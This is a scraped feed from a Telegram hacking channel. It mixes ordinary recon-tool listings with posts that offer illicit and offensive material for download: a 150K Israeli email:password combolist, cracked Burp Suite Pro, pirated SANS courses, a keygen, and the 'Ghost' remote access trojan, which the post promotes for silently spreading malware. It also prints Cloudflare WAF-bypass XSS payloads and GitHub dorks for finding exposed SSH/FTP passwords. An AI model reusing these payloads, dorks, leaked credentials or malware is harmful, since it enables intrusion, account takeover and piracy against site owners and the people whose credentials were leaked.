BugCod3
7.26K subscribers
334 photos
6 videos
7 files
445 links
[ BugCod3 ] โ€” From Shadows To Shells โšก๏ธ

๐Ÿ•ถ Hacking | ๐Ÿž Bug Bounty | ๐Ÿ” Security Tools
โš”๏ธ Learn โ€ข Hunt โ€ข Dominate

๐Ÿ‘ฅ Group: T.me/BugCod3GP
๐Ÿ“‚ Topic: T.me/BugCod3Topic

๐ŸŒ Web: BugCod3.com
๐Ÿค– Contact: T.me/BugCod3BOT
๐Ÿ“ง Email: BugCod3@protonmail.com
Download Telegram
๐Ÿถ SANS All Courses ๐Ÿถ

๐Ÿ’ฌ
Cyber Security Courses, Training, Certifications and Resources
The SANS Promise: Everyone who completes SANS training can apply the skills and knowledge theyโ€™ve learned the day they return to work.

๐Ÿ’ธ Price : 100,000 $ Plus โœ”๏ธ

๐Ÿ“‚ Size : 152.98 GB

โฌ‡๏ธ Download

#Sans #Courses
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค8โšก2๐Ÿ‘11
This media is not supported in your browser
VIEW IN TELEGRAM
โšก๏ธ Cloud7 Bot Exploit โšก๏ธ

Run Script with Python 2.7

๐Ÿ“Š Recommended:
python -m pip install requests
python -m pip install bs4
python -m pip install colorama
python -m pip install lxml


โฌ‡๏ธ Download
๐Ÿ”’ @LearnExploit

#Exploit #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
9โค3โคโ€๐Ÿ”ฅ1โšก1
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ’ฃ assetfinder ๐Ÿ’ฃ

๐Ÿ’ฌ Find domains and subdomains potentially related to a given domain.

๐Ÿ”ผ Install:
go get -u github.com/tomnomnom/assetfinder


๐Ÿ“‚ Usage:
assetfinder [--subs-only] <domain>


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#asset #finder #sub #domain
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
4โšก1โค1
๐Ÿง‘โ€๐Ÿ’ป 150K Israel Combolist ๐Ÿ‡ฎ๐Ÿ‡ฑ

๐Ÿ’ก Format:
Email:Pass

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Combo #List #Israel
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
10โค3โšก2
๐Ÿ‘ฉโ€๐Ÿ’ป 16K+ ULTIMATE DEEPWEB/ONION LINKS + GUIDE ๐Ÿ‘ฉโ€๐Ÿ’ป

โฌ‡๏ธ Download

#Deep #Web
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
6โšก1โค1
๐Ÿ’™ Burpsuite Pro ๐Ÿ’™

๐Ÿ“‚ README (en+ru) included, plz read it before run BS.

๐Ÿ”ผ Run with Java 18 (JDK for Win included)

โฌ‡๏ธ Download
๐Ÿ”’ 311138

#Burpsuite #Pro #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค74โšก1
Media is too big
VIEW IN TELEGRAM
๐Ÿ‘ป steghide ๐Ÿ‘ป

๐Ÿ’ฌ
Steghide is steganography program which hides bits of a data file in some of the least significant bits of another file in such a way that the existence of the data file is not visible and cannot be proven.

๐Ÿ’ก
Steghide is designed to be portable and configurable and features hiding data in bmp, jpeg, wav and au files, blowfish encryption, MD5 hashing of passphrases to blowfish keys, and pseudo-random distribution of hidden bits in the container data.

๐Ÿ•ธ Steghide is useful in digital forensics investigations.

๐Ÿ”ผ Install:
๐Ÿ‘ฉโ€๐Ÿ’ป Kali:
sudo apt install steghide


โฌ‡๏ธ Download (windows)
๐Ÿ”’ BugCod3

#Steghide #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค33โšก1
Media is too big
VIEW IN TELEGRAM
๐Ÿ•ท ExifTool ๐Ÿ•ท

๐Ÿ’ฌ
Image::ExifTool is a customizable set of Perl modules plus a full-featured command-line application called exiftool for reading and writing meta information in a wide variety of files, including the maker note information of many digital cameras by various manufacturers such as Canon, Casio, DJI, FLIR, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Nintendo, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Phase One, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon and Sony.

๐Ÿ“Š
The following modules/packages are recommended for specific features, e.g. decoding compressed and/or encrypted information from the indicated file types, calculating digest values for some information types, etc.:

โšช๏ธ Archive::Zip / libarchive-zip-perl: ZIP, DOCX, PPTX,
XLSX, ODP, ODS, ODT, EIP, iWork

โšช๏ธ Unicode::LineBreak / libunicode-linebreak-perl: for column-alignment of alternate language output

โšช๏ธ POSIX::strptime / libposix-strptime-perl: for inverse date/time conversion

โšช๏ธ Time::Piece (in perl core): alternative to POSIX::strptime

โšช๏ธ IO::Compress::RawDeflate + IO::Uncompress::RawInflate (in perl core): for reading FLIF images

โšช๏ธ Compress::Raw::Lzma / libcompress-raw-lzma-perl: for reading encoded 7z files

โšช๏ธ IO::Compress::Brotli + IO::Uncompress::Brotli / libio-compress-brotli-perl: for writing/reading compressed JXL metadata

๐Ÿ”ผ Install:
๐Ÿ‘ฉโ€๐Ÿ’ป Kali:
sudo apt install libimage-exiftool-perl


โฌ‡๏ธ Download ๐Ÿ”Ÿ๐Ÿ‘ฉโ€๐Ÿ’ป๐Ÿ‘ฉโ€๐Ÿ’ป
๐Ÿ”’ BugCod3

#Steghide #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3โšก1โค1
๐ŸฆŠ DalFox ๐ŸฆŠ

๐Ÿ’ฌ
DalFox is a powerful open-source tool that focuses on automation, making it ideal for quickly scanning for XSS flaws and analyzing parameters. Its advanced testing engine and niche features are designed to streamline the process of detecting and verifying vulnerabilities.

๐Ÿ”ผ Install:
go install github.com/hahwul/dalfox/v2@latest


๐Ÿ’ป Usage:
dalfox [mode] [target] [flags]


๐Ÿ‘ค Single target mode:
dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff \
-b https://your-callback-url


๐Ÿ‘ฅ Multiple target mode from file:
dalfox file urls_file --custom-payload ./mypayloads.txt


๐ŸชŸ Pipeline mode:
cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"


๐Ÿ˜ธ Github

โฌ‡๏ธ Donwload
๐Ÿ”’ BugCod3

#Go #XSS #Scanner #Vulnerability #BugBounty
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3โšก1โค1๐Ÿ‘1
Cloudflare bypass XSS payloads

Tested On: ๐Ÿ‘ฉโ€๐Ÿ’ป

XSS Payloads:
for(t?c.outerHTmL=o:i=o=โ€™โ€™;i++<1024;o+=`<code onclick=this.innerHTmL=โ€™${M(i)?โ€™*โ€™:n||โ€™ยทโ€™}โ€™>#</code>${i%64?โ€™โ€™:โ€™<p>โ€™}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javascript:{alert โ€˜0โ€™ }
โ‰‹ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># โ‰‹
<svg/OnLoad="`${prompt``}`">


#Exploit #XSS #Payload
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘33โšก2โค2
New xss payload to bypass cloudflare WAF

<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>


#XSS #Payload #Bypass #CF #WAF
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
4โค2โšก1๐Ÿพ1
๐Ÿ‘ฃ haktrails ๐Ÿ‘ฃ

๐Ÿ’ฌ
haktrails is a Golang client for querying SecurityTrails API data, sponsored by SecurityTrails.

๐Ÿ“Š Tool Features:
โšช๏ธ stdin input for easy tool chaining
โšช๏ธ subdomain discovery
โšช๏ธ associated root domain discovery
โšช๏ธ associated IP discovery
โšช๏ธ historical DNS data
โšช๏ธ historical whois data
โšช๏ธ DSL queries (currently a prototype)
โšช๏ธ company discovery (discover the owner of a domain)
โšช๏ธ whois (returns json whois data for a given domain)
โšช๏ธ ping (check that your current SecurityTrails configuration/key is working)
โšช๏ธ usage (check your current SecurityTrails usage)
โšช๏ธ "json" or "list" output options for easy tool chaining
โšช๏ธ "ZSH & Bash autocompletion"

๐Ÿ”ผ Installation:
go install -v github.com/hakluke/haktrails@latest


๐Ÿ’ป Usage:

Gather subdomains
cat domains.txt | haktrails subdomains
echo "yahoo.com" | haktrails subdomains

and...

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Go #Subdomain #IP #Discovery
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
2โšก1โค1๐Ÿ”ฅ1
Main sinks that can lead to DOM-XSS

#Javacript #Dom #XSS
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3โšก1โค1๐Ÿ‘1
๐ŸฆŽ Subprober ๐ŸฆŽ

๐Ÿ”” Subprober v1.0.5 - Fast Probing Tool for Penetration Testing

๐Ÿ‘โ€๐Ÿ—จ Overview:
Subprober v1.0.5 is a powerful and efficient tool designed for penetration testers and security professionals. This release introduces several enhancements, bug fixes, and new features to elevate your subdomain probing experience. Subprober facilitates fast and reliable information extraction, making it an invaluable asset for penetration testing workflows.

๐Ÿ“Š Features:
โšช๏ธ Subprober Concurrency and Accuracy are Improved with libraries like aiohttp,asyncio
โšช๏ธ Subprober Error handling and Synchronization are improved
โšช๏ธ Resolved some Bugs for Subprober
โšช๏ธ Subprober Commands are changed with usefull flags
โšช๏ธ Resolved executive errors in v1.0.4
โšช๏ธ Subprober requires python version 3.11.x

๐Ÿ”ผ Installation:
Method 1:
pip install git+https://github.com/sanjai-AK47/Subprober.git

Method 2:
cd Subprober
pip install .


๐Ÿ’ป Basic Usage:
subprober -f subdomains.txt -o output.txt -tl -wc -sv  -apt -wc -ex 500 -v -o output.txt -c 20


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Subdomains #Scanner
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค22โšก1๐Ÿ‘1
๐Ÿ‘ป Ghost ๐Ÿ‘ป

๐Ÿ‘ป RAT (Remote Access Trojan) - Silent Botnet - Full Remote Command-Line Access - Download & Execute Programs - Spread Virus' & Malware

๐Ÿ’ฌ
ghost is a light RAT that gives the server/attacker full remote access to the user's command-line interpreter (cmd.exe). They are allowed to execute commands silently without the client/zombie noticing. The server/attacker is also given the ability to download and execute files on the client/zombie's computer. This is also a silent and hidden process. Like most Remote Access Trojans, this download and execution ability helps distribute viruses and other pieces of malware.

๐Ÿ‘โ€๐Ÿ—จ
This malware is distributed simply by running zombie.exe. This file name can be changed to whatever. There is no restriction. When run, it searches for the first two arguments (IP & Port). If neither is provided, the program doesn't run. With that being said, make sure you provide the server's IP and Port in the command-line arguments. Example:
zombie.exe 127.0.0.1 27015



๐Ÿ“Š Features:
โšช๏ธ Remote command execution
โšช๏ธ Silent background process
โšช๏ธ Download and run file (Hidden)
โšช๏ธ Safe Mode startup
โšช๏ธ Will automatically connect to the server
โšช๏ธ Data sent and received is encrypted (substitution cipher)
โšช๏ธ Files are hidden
โšช๏ธ Installed Antivirus shown to server
โšช๏ธ Easily spread malware through download feature
โšช๏ธ Startup info doesn't show in msconfig or other startup checking programs like CCleaner
โšช๏ธ Disable Task Manager

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Rat #Malware #Remote #Access
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘33โšก1โค1
๐Ÿ•ท hakip2host ๐Ÿ•ท

๐Ÿ’ฌ
hakip2host takes a list of IP addresses via stdin, then does a series of checks to return associated domain names.

๐Ÿ“Š Current supported checks are:
โšช๏ธ DNS PTR lookups
โšช๏ธ Subject Alternative Names (SANs) on SSL certificates
โšช๏ธ Common Names (CNs) on SSL certificates

๐Ÿ”ผ Installation:
go install github.com/hakluke/hakip2host@latest


๐Ÿ’ป Usage:
hakip2host --help


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Osint #Recon #CIDR #HTTPS
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
4โšก1โค1๐Ÿ‘1
๐Ÿ‘ Burpsuite Pro ๐Ÿ‘

๐Ÿ“‚ README (en+ru) included, plz read it before run BS.

๐Ÿ”ผ Run with Java 18 (JDK for Win included)

โฌ‡๏ธ Download
๐Ÿ”’ 311138

#Burpsuite #Pro #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
4โšก1โค1
๐ŸŒ Bypass login authentication ๐ŸŒ

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Bypass #Login #Page #Authentication
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
7โคโ€๐Ÿ”ฅ2โšก1โค1๐Ÿ‘1
๐Ÿซฅ MobaXterm Keygen ๐Ÿ”˜

โš ๏ธ Please see source code. It is not complex. โš ๏ธ

I don't know how to make custom settings take effect in Customizer mode directly.

๐Ÿ’ฌ
The only way I found is that you should export custom settings to a file named MobaXterm customization.custom which is also a zip file. Then merge two zip file: Custom.mxtpro and MobaXterm customization.custom to Custom.mxtpro. Finally copy newly-generated Custom.mxtpro to MobaXterm's installation path.

๐Ÿ“Š Postscript:
โšช๏ธ This application does not have complex activation algorithm and it is truly fantastic. So please pay for it if possible.

โšช๏ธ The file generated, Custom.mxtpro, is actually a zip file and contains a text file, Pro.key, where there is a key string.

โšช๏ธ MobaXterm.exe has another mode. You can see it by adding a parameter "-customizer".
./MobaXterm.exe -customizer


๐Ÿ’ป Usage:
./MobaXterm-Keygen.py "DoubleSine" 10.9


๐Ÿ˜ธ Github

โฌ‡๏ธ Donwload
๐Ÿ”’ BugCod3

#Python #MobaXterm #Keygen #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
6โšก1โค1
The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!

Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/

#infosec #cybersecurite #bugbountytip
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
7โšก1โค1